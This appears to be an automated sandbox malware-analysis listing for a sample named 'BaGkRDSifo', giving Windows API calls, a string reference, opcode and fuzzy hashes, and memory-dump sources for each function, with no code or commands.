Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: MessagePeek
String ID: fXV
API String ID: 2222842502-3172339192
Opcode ID: ceaaa679fefa0d808fe48f6f481e963ae02da4e9fd12ffc2aa2d9b1d8fa0b753
Instruction ID: 35504f7300eff827059c120a37c00096e5e533e98cedd0ef1e7ee3f4c5acc2ad
Opcode Fuzzy Hash: ceaaa679fefa0d808fe48f6f481e963ae02da4e9fd12ffc2aa2d9b1d8fa0b753
Instruction Fuzzy Hash: 7E1126B5C002499FDB20CF9AC944BDEFBF8EB48310F10802AE958A3650C378A944CFA5

Function 0A300608 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0A300677

Strings

fXV, xrefs: 0A30062A

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: fXV
API String ID: 2492992576-3172339192
Opcode ID: 279c167ed7403f3379df615f97b9245e90107deb39b2dcfd3901694dd2a6643f
Instruction ID: 9e900747977cec59e9220566a455180f929d8cdacc1a4aef81bce20856ba272a
Opcode Fuzzy Hash: 279c167ed7403f3379df615f97b9245e90107deb39b2dcfd3901694dd2a6643f
Instruction Fuzzy Hash: 68113DB5800249CFDB20CF9AC545BEEFBF4EB49320F14806AE458A3751D338A644CFA5

Function 06AD7550 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 06AD75BA

Strings

fXV, xrefs: 06AD756F

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: TextWindow
String ID: fXV
API String ID: 530164218-3172339192
Opcode ID: 35d01c1a6225802c4df23c50c3bf6661c221d6ff47e1619c93eafcf91b37fa3a
Instruction ID: 618c13e5f3c946a5611ca0469f4343630b6e2bc2f680071445cd78b85671f066
Opcode Fuzzy Hash: 35d01c1a6225802c4df23c50c3bf6661c221d6ff47e1619c93eafcf91b37fa3a
Instruction Fuzzy Hash: 921126B6C002498FDB14CF9AC944BDEFBF4EB48310F14842AD869A7650D338A545CFA5

Function 0B3305C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0B330625

Strings

fXV, xrefs: 0B3305DF

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: fXV
API String ID: 2492992576-3172339192
Opcode ID: fdf71e4be031d99b30b71cab4a53076e89fb823441af4fab45349b1e412dd781
Instruction ID: 41960f20b3d3b73e924a5bb0ff2f6c1a58053c5e168f47eaf5a60b8ae8276b71
Opcode Fuzzy Hash: fdf71e4be031d99b30b71cab4a53076e89fb823441af4fab45349b1e412dd781
Instruction Fuzzy Hash: 1611D4B5C003499FDB10CF9AD944BDEFBF8EB48714F14842AE558A3650D378A544CFA5

Function 024EAD20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 024EAD93

Strings

fXV, xrefs: 024EAD3F

Memory Dump Source

Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID: ProtectVirtual
String ID: fXV
API String ID: 544645111-3172339192
Opcode ID: 2a208a4d7c3128a3bb135260d164911bd30d504d4c08f38d9b4e1b454fe6655e
Instruction ID: 5991854089d34050f3e7799ce1d3babe93da7135a42b2e74d400e70763b1822d
Opcode Fuzzy Hash: 2a208a4d7c3128a3bb135260d164911bd30d504d4c08f38d9b4e1b454fe6655e
Instruction Fuzzy Hash: 7111E2B5D002589FDB20CF9AC984ADEFBF4FB48314F10842AE859A7250C374A944CFA5

Function 0A300610 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0A300677

Strings

fXV, xrefs: 0A30062A

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: fXV
API String ID: 2492992576-3172339192
Opcode ID: 03a33bda2f560b9845de7cf7e6e5925af84ebb6e39f6c6aa1623e99987ba8fb2
Instruction ID: 9039315a5b1414f983f69f4ca59336df532b2b1e1fc58acf47d46c2940909236
Opcode Fuzzy Hash: 03a33bda2f560b9845de7cf7e6e5925af84ebb6e39f6c6aa1623e99987ba8fb2
Instruction Fuzzy Hash: C2111CB5810249CFDB20CF9AC545BEEFBF4EB49324F14842AE558A3791D338A644CFA5

Function 0B330A80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0B330AE5

Strings

fXV, xrefs: 0B330AA7

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: DispatchMessage
String ID: fXV
API String ID: 2061451462-3172339192
Opcode ID: 5aa4b254e3b3d3b3776948d578c10bf078e2b0baa145fc72cd3653d916103615
Instruction ID: f649703fdec71b9a184ca1e286c22686b3f73659116c4e5e3dd2f192e9b49dd0
Opcode Fuzzy Hash: 5aa4b254e3b3d3b3776948d578c10bf078e2b0baa145fc72cd3653d916103615
Instruction Fuzzy Hash: E01113B5C042988FCB21CFAAD944BDEFFF4EB48314F10845AD458A7610C3786544CFA5

Function 06ADFCE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06ADFD45

Strings

fXV, xrefs: 06ADFD02

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessagePost
String ID: fXV
API String ID: 410705778-3172339192
Opcode ID: ef44deffc61ce9985e6ea5972a8749a8bf07d060f68393f0d8fc6dc4c58095bd
Instruction ID: abfef436ad079f6542e06c496fb3e97e8809dcaf39eb6b2b3289f71e981f4d57
Opcode Fuzzy Hash: ef44deffc61ce9985e6ea5972a8749a8bf07d060f68393f0d8fc6dc4c58095bd
Instruction Fuzzy Hash: 041136B58003498FDB10CF9AC945BDEFBF8EB48324F10841AE559A7650D378A944CFA5

Function 05A31F30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05A31F95

Strings

fXV, xrefs: 05A31F52

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: LongWindow
String ID: fXV
API String ID: 1378638983-3172339192
Opcode ID: a5252a69828959f13e157be3459e418b1aa11ec6c39390496f20ead5f16d9c7b
Instruction ID: 9f4f52091b6de180eebd707b9b41635c606017eeb48c184c86d498448a2b05ce
Opcode Fuzzy Hash: a5252a69828959f13e157be3459e418b1aa11ec6c39390496f20ead5f16d9c7b
Instruction Fuzzy Hash: AF1106B5C003489FDB10CF9AD585BDEBBF8EB49324F20841AE519A7740C375A944CFA5

Function 06ADA158 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06ADC265

Strings

fXV, xrefs: 06ADC222

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessageSend
String ID: fXV
API String ID: 3850602802-3172339192
Opcode ID: 3e2b2ed05bcb9946378ffeb4b0d2fb573baea583d9967706e30e58a8ac95ace4
Instruction ID: bb9d7656391d9de46e6d1ab4e38ad332fdae2cfc160dffe70faa343321bbc2dc
Opcode Fuzzy Hash: 3e2b2ed05bcb9946378ffeb4b0d2fb573baea583d9967706e30e58a8ac95ace4
Instruction Fuzzy Hash: 251133B5800348DFDB20DF9AC984BDEFBF8EB48724F10845AE529A7200D375A940CFA5

Function 05AAACC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 05AAAD26

Strings

fXV, xrefs: 05AAACDF

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: HandleModule
String ID: fXV
API String ID: 4139908857-3172339192
Opcode ID: a22a11bed9be74fef27fe07dfe1509a51efef796a36c3e9bdd01bf38137eddc8
Instruction ID: 324ac5a5f59f224c666a0cd6f8f698345dc930be06029c1abf87256e8c00dabf
Opcode Fuzzy Hash: a22a11bed9be74fef27fe07dfe1509a51efef796a36c3e9bdd01bf38137eddc8
Instruction Fuzzy Hash: 9D11E0B6C002498FDB20CF9AD944BDEFBF4EF88214F14842AD469B7610D379A545CFA5

Function 06ADC200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000018,00000001,?), ref: 06ADC265

Strings

fXV, xrefs: 06ADC222

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessageSend
String ID: fXV
API String ID: 3850602802-3172339192
Opcode ID: a44bb82cd39f975e7f824a480f3ab905b37b3b6f4ced7b123eefdd4782e6802f
Instruction ID: 0b26ad7d6088a6d88ab406a88fdede9a34ea39b1e6f08d3e2b609e15f7c00ff1
Opcode Fuzzy Hash: a44bb82cd39f975e7f824a480f3ab905b37b3b6f4ced7b123eefdd4782e6802f
Instruction Fuzzy Hash: 981136B58003499FDB20DF99C984BDEFFF8EB48724F20845AE455A7650C375A540CFA5

Function 0B33E000 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32 ref: 0B33E065

Strings

fXV, xrefs: 0B33E027

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: DispatchMessage
String ID: fXV
API String ID: 2061451462-3172339192
Opcode ID: 4a880dfee4baf47b8538a77b4782d9b73f103fb3cb979e1dc77d03a2ef082738
Instruction ID: 6eb8e3e9aa537019091b03be58221eba5c45115984a2f744bc5eb5e21987bdd2
Opcode Fuzzy Hash: 4a880dfee4baf47b8538a77b4782d9b73f103fb3cb979e1dc77d03a2ef082738
Instruction Fuzzy Hash: C211E0B5C00659CFCB20CF9AD944BDEFBF4EB48724F10856AE818A7610D378A544CFA5

Function 0A30033E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 0A30039D

Strings

fXV, xrefs: 0A30035A

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: Timer
String ID: fXV
API String ID: 2870079774-3172339192
Opcode ID: 6adaac1837ad6ac3eb09dea0c303be0f6cdf45098507770510e184dfaefb1d55
Instruction ID: c8a83aafc8d0404f033a11dd3597d6e39995272a9d01b92216b57aa1e0800312
Opcode Fuzzy Hash: 6adaac1837ad6ac3eb09dea0c303be0f6cdf45098507770510e184dfaefb1d55
Instruction Fuzzy Hash: A71103B58003489FDB20CF9AC944BDEFBF8EB48314F10841AE558A7250D379AA44CFA5

Function 06AD8990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 06AD89ED

Strings

fXV, xrefs: 06AD89AA

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessageSend
String ID: fXV
API String ID: 3850602802-3172339192
Opcode ID: 7ed2020b3ebb3e0f56db107e1c090d17d898f032f767a9e297a57340cb166373
Instruction ID: bc98630ab6ed5db407e9385ad4672485fd9bdf26e01d7e7ca1a8759d1140c685
Opcode Fuzzy Hash: 7ed2020b3ebb3e0f56db107e1c090d17d898f032f767a9e297a57340cb166373
Instruction Fuzzy Hash: FE1115B58003489FDB20DF9AC945BDEFBF8EB48310F10841AE559A7250C379A944CFA5

Function 05A31F38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05A31F95

Strings

fXV, xrefs: 05A31F52

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: LongWindow
String ID: fXV
API String ID: 1378638983-3172339192
Opcode ID: 414e79d0af2d275d665c289ccde35b7620244b4bc04d512b6cf844cf905f928b
Instruction ID: 570ccf8a7e68ce5f95bde810200cc4e38a63cc1f4de1886f9fcc03b128dc36a8
Opcode Fuzzy Hash: 414e79d0af2d275d665c289ccde35b7620244b4bc04d512b6cf844cf905f928b
Instruction Fuzzy Hash: 341115B58003488FDB20CF9AC585BDEFBF8EB48324F20841AE919A7740C374A944CFA5

Function 0A300340 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 0A30039D

Strings

fXV, xrefs: 0A30035A

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: Timer
String ID: fXV
API String ID: 2870079774-3172339192
Opcode ID: f405f7cb92b301587859018febf0f17380607f361666cff74b3ddaedfacd5c30
Instruction ID: 2bf85896d8f7a4098b970a7a8dfe226d8f80d74993d7831ee37ac12d88ccb2fb
Opcode Fuzzy Hash: f405f7cb92b301587859018febf0f17380607f361666cff74b3ddaedfacd5c30
Instruction Fuzzy Hash: 441115B58003489FDB20CF9AC944BDEFBF8EB48314F10841AE558A7250C379AA44CFA5

Function 0B330A88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 0B330AE5

Strings

fXV, xrefs: 0B330AA7

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: DispatchMessage
String ID: fXV
API String ID: 2061451462-3172339192
Opcode ID: 33db174b24b9ffe73f13ba4f40c18c3e6ec7327f1603082bc2e77af6cf63463a
Instruction ID: 14df79f3387b580faddaaa918f10af5a3a8261743b5ce06612ada9489062aeda
Opcode Fuzzy Hash: 33db174b24b9ffe73f13ba4f40c18c3e6ec7327f1603082bc2e77af6cf63463a
Instruction Fuzzy Hash: 8C1100B5C002498FCB24CF9AD944BCEFBF4EB48314F20842AD419A3610D378A544CFA5

Function 0B33E008 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32 ref: 0B33E065

Strings

fXV, xrefs: 0B33E027

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: DispatchMessage
String ID: fXV
API String ID: 2061451462-3172339192
Opcode ID: 4bb08a0e20d02b12cb17dc1b692b75e9a4652dab41c15516de71493839eb8f3e
Instruction ID: f662ba8ae284c76fc454a3d4a90842f97870bc315f3a8f387c3c3c6a2cef7266
Opcode Fuzzy Hash: 4bb08a0e20d02b12cb17dc1b692b75e9a4652dab41c15516de71493839eb8f3e
Instruction Fuzzy Hash: 0D1100B5C002588FCB20CFAAD944BCEFBF4EB48714F20842AE418A3610D378A544CFA5

Function 024EB970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 024EB9D8

Strings

fXV, xrefs: 024EB98A

Memory Dump Source

Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID: AllocVirtual
String ID: fXV
API String ID: 4275171209-3172339192
Opcode ID: 96e236b82eb15ea92fb8dff418aefb2e939a1e3f48715f405f3094886fe6c5d6
Instruction ID: e465b52021c0288e06679641d55e3561edf3281596e0b22959ad8c3f45db5cca
Opcode Fuzzy Hash: 96e236b82eb15ea92fb8dff418aefb2e939a1e3f48715f405f3094886fe6c5d6
Instruction Fuzzy Hash: BD1102B69002489FDB20DFAAC944BDEFBF4EB48324F20841AE559A7250C375A944CFA5

Function 06AC22D8 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,041B4100,035B1A20,?,00000000), ref: 06AC2436

Memory Dump Source

Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 377cd4ecf01d6dbc2c6329198178b40a73bfd4dea7d2fb6ce0dab3ca3324bd88
Instruction ID: fbe85799458d5b4f77b948fef908fbe8ff008fce7f17e751070e1ae003cab633
Opcode Fuzzy Hash: 377cd4ecf01d6dbc2c6329198178b40a73bfd4dea7d2fb6ce0dab3ca3324bd88
Instruction Fuzzy Hash: 11718E74A11208EFCB54DF69D984E9EBBB6FF48724B114098F905AB361DB31ED81CB50

Function 06ADFD80 Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 06ADFD45

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8749a5435f88447ef7289d481ac380b8533f426f928f54253517b5b238f0cf6d
Instruction ID: ae748f9fd395fc0635864d226f77ef276723e61ac05c962a57b3e29b3c19f842
Opcode Fuzzy Hash: 8749a5435f88447ef7289d481ac380b8533f426f928f54253517b5b238f0cf6d
Instruction Fuzzy Hash: F331A976E003058FDB64EF69C8447AFBBF5AF89214F18442ED487AB691DB34D845CBA0

Function 0A303928 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0A3039A6

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: e32274e055ea78796ec0ea1b1237e6355fa51d472ac832eaa6632b2de2c5bbb6
Instruction ID: 1a53fe246884300cb197c67d52beb03da4a80e62c9e0ac0edfe46562bfff9f40
Opcode Fuzzy Hash: e32274e055ea78796ec0ea1b1237e6355fa51d472ac832eaa6632b2de2c5bbb6
Instruction Fuzzy Hash: D821CA32B001149BEB14DB6AEC11FAAB766EFC4324F098169E5099B791CB70EC61CBD4

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040AD50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AD5A

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 3374a06f9b3d2d068d2f82a32e0eba00299d11aef8e131c065cca21440f1d622
Instruction ID: 1d107a11a906ec6b97ad05ef89e0782f1ba8d3b6ff8f86867a68f26e47426dd2
Opcode Fuzzy Hash: 3374a06f9b3d2d068d2f82a32e0eba00299d11aef8e131c065cca21440f1d622
Instruction Fuzzy Hash: 8DB012B7804201ABC504E650E58680BB7DCEAE0200F81C879F04886070D338E504874B

Function 0243D610 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3ba990d44efb7c4d3001985ddeee2b808f960bc2e7a48461bba1e5478b34e6
Instruction ID: 079610881bf457a4ced8d2dc987878b06c9dcf79394f2e34f4debd25568d6c70
Opcode Fuzzy Hash: 1e3ba990d44efb7c4d3001985ddeee2b808f960bc2e7a48461bba1e5478b34e6
Instruction Fuzzy Hash: 7621F5B1A04244DFDF16DF10D9C0B1BBBA5FB8C714F24856AE91D0B356C336D456CAA2

Function 0243D524 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480470502.000000000243D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0243D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_243d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e19edeb7ff5a604a1dcad795a8886eb2c34f6c3216ea631cb705646d281ee6f
Instruction ID: 1dd8e37595fda183174f8db9fb66c32e9b8515dae692da6b49fc9bef092c6b67
Opcode Fuzzy Hash: 8e19edeb7ff5a604a1dcad795a8886eb2c34f6c3216ea631cb705646d281ee6f
Instruction Fuzzy Hash: AE21C5B2904244EFDF16DF14D9C0B27BFA5FB88318F24856AE9090F356C336D556CAA2

Function 0244D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2480709451.000000000244D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0244D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_244d000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acf4eb17fa2e2fe0eba56d01c2c52ada3766547a94f0bcc93773e3253e3d6ec5
Instruction ID: 34fbd6a95a11c869d2513b604b1fb20e6d7e59236495bf5b7a4c4cf659fa15af
Opcode Fuzzy Hash: acf4eb17fa2e2fe0eba56d01c2c52ada3766547a94f0bcc93773e3253e3d6ec5
Instruction Fuzzy Hash: CD21F271904244DFEB24DF14D9C4B27BBA5FB84318F24C56AE90A0B342C736E847CEA2

